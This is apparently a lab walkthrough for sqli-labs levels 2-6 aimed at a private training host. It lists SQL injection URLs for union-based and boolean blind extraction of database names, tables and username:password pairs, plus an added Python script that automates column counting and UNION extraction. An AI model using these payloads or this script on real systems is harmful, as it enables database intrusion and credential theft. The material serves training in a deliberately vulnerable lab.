SQL Challenge Levels 2-6: The Corresponding Payloads

Table of contents

  • Preface
  • 1. SQL database structure
  • 2. Level 2 payloads
  • 3. Level 3 payloads
  • 4. Level 4 payloads
  • 5. Level 5 payloads
  • 6. Level 6 payloads
  • Summary

Preface

The approach to Levels 2-4 of the SQL challenge is essentially the same as Level 1, and the approach to Levels 5-6 is essentially the same as Level 8, so here I only list the URLs used for each level; since the pattern is identical there is no need to repeat the walkthrough. If you run into something you do not understand, refer to my earlier posts in the SQL challenge series. I hope this makes for a good read.


1. SQL database structure

Before injecting a MySQL database you need to know how its metadata is laid out. The shortcut to remember is "1 database, 3 tables, 6 fields".

The 1 database is information_schema.

The 3 tables are schemata, tables and columns.

The 6 fields are: schema_name in schemata; table_name and table_schema in tables; and table_name, table_schema and column_name in columns.

Once you are familiar with this "1 database, 3 tables, 6 fields" layout, the payloads below are much easier to follow.


2. Level 2 payloads

http://192.168.182.30/sql/Less-2/?id=1'

http://192.168.182.30/sql/Less-2/?id=1 and 1=1

http://192.168.182.30/sql/Less-2/?id=1 and 1=2 -> the page changes, so this is a numeric injection (there is no quote to close)

http://192.168.182.30/sql/Less-2/?id=1 order by 3%23

http://192.168.182.30/sql/Less-2/?id=1 order by 4%23 -> ORDER BY 3 works and ORDER BY 4 errors, so the query returns three columns

http://192.168.182.30/sql/Less-2/?id=-1 union select 1,2,3 -> id=-1 matches no row, so columns 2 and 3 of our UNION row are the ones displayed

http://192.168.182.30/sql/Less-2/?id=-1 union select 1,database(),version()

http://192.168.182.30/sql/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -> Level 2 is numeric, so no trailing # (%23) comment is needed

http://192.168.182.30/sql/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

http://192.168.182.30/sql/Less-2/?id=-1 union select 1,2,group_concat(username,0x3a,password) from security.users


3. Level 3 payloads

http://192.168.182.30/sql/Less-3/?id=1')%23

http://192.168.182.30/sql/Less-3/?id=1') and 1=1%23

http://192.168.182.30/sql/Less-3/?id=1') and 1=2%23 -> string injection; the id is wrapped in ('...') so we close it with ')

http://192.168.182.30/sql/Less-3/?id=1') order by 3%23

http://192.168.182.30/sql/Less-3/?id=1') order by 4%23 -> three columns

http://192.168.182.30/sql/Less-3/?id=-1') union select 1,2,3%23

http://192.168.182.30/sql/Less-3/?id=-1') union select 1,database(),version()%23

http://192.168.182.30/sql/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23

http://192.168.182.30/sql/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'%23

http://192.168.182.30/sql/Less-3/?id=-1') union select 1,2,group_concat(username,0x3a,password) from users%23


4. Level 4 payloads

http://192.168.182.30/sql/Less-4/?id=1")%23

http://192.168.182.30/sql/Less-4/?id=1") and 1=1%23

http://192.168.182.30/sql/Less-4/?id=1") and 1=2%23 -> string injection; the id is wrapped in ("...") so we close it with ")

http://192.168.182.30/sql/Less-4/?id=1") order by 3%23

http://192.168.182.30/sql/Less-4/?id=1") order by 4%23 -> three columns

http://192.168.182.30/sql/Less-4/?id=-1") union select 1,2,3%23

http://192.168.182.30/sql/Less-4/?id=-1") union select 1,database(),version()%23

http://192.168.182.30/sql/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23

http://192.168.182.30/sql/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'%23

http://192.168.182.30/sql/Less-4/?id=-1") union select 1,2,group_concat(username,0x3a,password) from users%23
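
The Level 2 to Level 4 flow above, automated. This is an added example and not code from the original post: it finds the column count with ORDER BY (the first n that errors means n-1 columns) and then sends the UNION SELECT with id=-1 so only our row is reflected. Assumptions: the post's http://192.168.182.30/sql/Less-N/?id= endpoint, that the HTTP layer percent-encodes the payload (# as %23), and that run_query raises when the page shows a MySQL error. To run offline, the vulnerable query is simulated with a sqlite3 table of constructed rows; sqlite needs `-- ` instead of `#` as the comment and `||` instead of concat(). Only the numeric and `')` contexts are simulated, because sqlite's treatment of double-quoted literals is build dependent.

```python
# Added example, not the post's code: automate the ORDER BY / UNION SELECT
# steps of Level 2-4.  The target endpoint and the behaviour of run_query
# (return rows, raise on a SQL error) are assumptions; the sqlite3 part is a
# constructed offline stand-in for the vulnerable PHP query.
import sqlite3

# What must be appended to the id to close the original quoting.
CLOSERS = {"Less-2": "", "Less-3": "')", "Less-4": '")'}


def payload(level, sql, base="1", comment="#"):
    """Inject `sql` after the id value; numeric Level 2 needs no comment.
    Over HTTP the result must still be percent-encoded (# -> %23)."""
    close = CLOSERS[level]
    return f"{base}{close} {sql}{comment if close else ''}"


def column_count(run_query, level, max_cols=20, comment="#"):
    """run_query(id_param) returns rows or raises on a SQL error
    (e.g. MySQL's 'Unknown column' in the response).  The first n whose
    ORDER BY fails gives n-1 columns."""
    for n in range(1, max_cols + 1):
        try:
            run_query(payload(level, f"order by {n}", comment=comment))
        except Exception:
            return n - 1
    raise ValueError("no ORDER BY error within max_cols")


def union_extract(run_query, level, ncols, select_expr, from_clause="", comment="#"):
    """UNION with id=-1 so the original query matches nothing; select_expr is
    placed in the last column (Level 2-4 reflect columns 2 and 3)."""
    cols = [str(i) for i in range(1, ncols)] + [select_expr]
    sql = f"union select {','.join(cols)} {from_clause}".rstrip()
    rows = run_query(payload(level, sql, base="-1", comment=comment))
    return rows[0][-1]


def make_simulation(level):
    """Constructed offline stand-in: same string concatenation as the sqli-labs
    PHP, but on sqlite3, so call the helpers with comment='-- '."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users(id INTEGER, username TEXT, password TEXT);"
        "INSERT INTO users VALUES (1,'Dumb','Dumb'),(2,'Angelina','I-kill-you');"
    )
    template = {"Less-2": "id=%s", "Less-3": "id=('%s')"}[level]

    def run_query(id_param):
        sql = ("SELECT id,username,password FROM users WHERE "
               + template % id_param + " LIMIT 0,1")
        return conn.execute(sql).fetchall()

    return run_query


if __name__ == "__main__":
    run = make_simulation("Less-3")
    n = column_count(run, "Less-3", comment="-- ")
    print("columns:", n)
    print(union_extract(run, "Less-3", n,
                        "group_concat(username||':'||password)", "from users",
                        comment="-- "))
```

Against the real target, select_expr and from_clause take the post's information_schema expressions unchanged, for example group_concat(table_name) with from information_schema.tables where table_schema='security', and group_concat(username,0x3a,password) with from security.users.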


5. Level 5 payloads

http://192.168.182.30/sql/Less-5/?id=1' and length(database())=8%23 -> step the number up from 1 (e.g. with Burp Intruder) until the page renders normally; =8 is true, so the database name is 8 characters long

http://192.168.182.30/sql/Less-5/?id=1' and substr(database(),1,1)='s'%23 -> the first character of the database name is s

http://192.168.182.30/sql/Less-5/?id=1' and substr(database(),1,1)='s'%23 -> mark the offset (1) and the character ('s') as Intruder payload positions; a cluster bomb attack over offsets 1-8 and the character set shows the database name is security

http://192.168.182.30/sql/Less-5/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=5%23 -> the current database has 5 tables

http://192.168.182.30/sql/Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6%23 -> the first table name is 6 characters long

http://192.168.182.30/sql/Less-5/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e'%23 -> brute-forcing each of the 6 offsets the same way gives the first table name, emails

http://192.168.182.30/sql/Less-5/?id=1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name = 'users')=3%23 -> the users table has 3 columns

http://192.168.182.30/sql/Less-5/?id=1' and substr((select username from users limit 0,1),1,1)='D'%23 -> the first username starts with D

http://192.168.182.30/sql/Less-5/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i'%23 -> the first column of users is id


6. Level 6 payloads

http://192.168.182.30/sql/Less-6/?id=1"

http://192.168.182.30/sql/Less-6/?id=1" and 1=1%23

http://192.168.182.30/sql/Less-6/?id=1" and 1=2%23 -> string injection, this time double-quoted

http://192.168.182.30/sql/Less-6/?id=1" and length(database())=8%23 -> step the number up from 1 as in Level 5; the database name is 8 characters long

http://192.168.182.30/sql/Less-6/?id=1" and substr(database(),1,1)='s'%23 -> the first character of the database name is s

http://192.168.182.30/sql/Less-6/?id=1" and substr(database(),1,1)='s'%23 -> a cluster bomb attack over the offset and the character gives the database name security

http://192.168.182.30/sql/Less-6/?id=1" and (select count(table_name) from information_schema.tables where table_schema=database())=5%23 -> 5 tables in total

http://192.168.182.30/sql/Less-6/?id=1" and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6%23 -> the first table name is 6 characters long

http://192.168.182.30/sql/Less-6/?id=1" and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e'%23 -> the first table name starts with e (emails)

http://192.168.182.30/sql/Less-6/?id=1" and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='emails')=2%23 -> the emails table has 2 columns

http://192.168.182.30/sql/Less-6/?id=1" and length((select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0, 1))=2%23 -> the first column name is 2 characters long

http://192.168.182.30/sql/Less-6/?id=1" and substr((select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0, 1),1,1)='i'%23 -> the first column is id


Summary

The payloads in the URLs above only cover a small part of what we want to read. To get the contents of other tables and columns, just change the corresponding parameter (the table_name filter, the limit offset, the substr offset). For Levels 5-6 you will need Burp Suite to capture the request and brute-force the values. If anything is unclear, read my earlier posts on Level 1 and Level 8 of the SQL challenge alongside this one; the two together should make it much clearer.
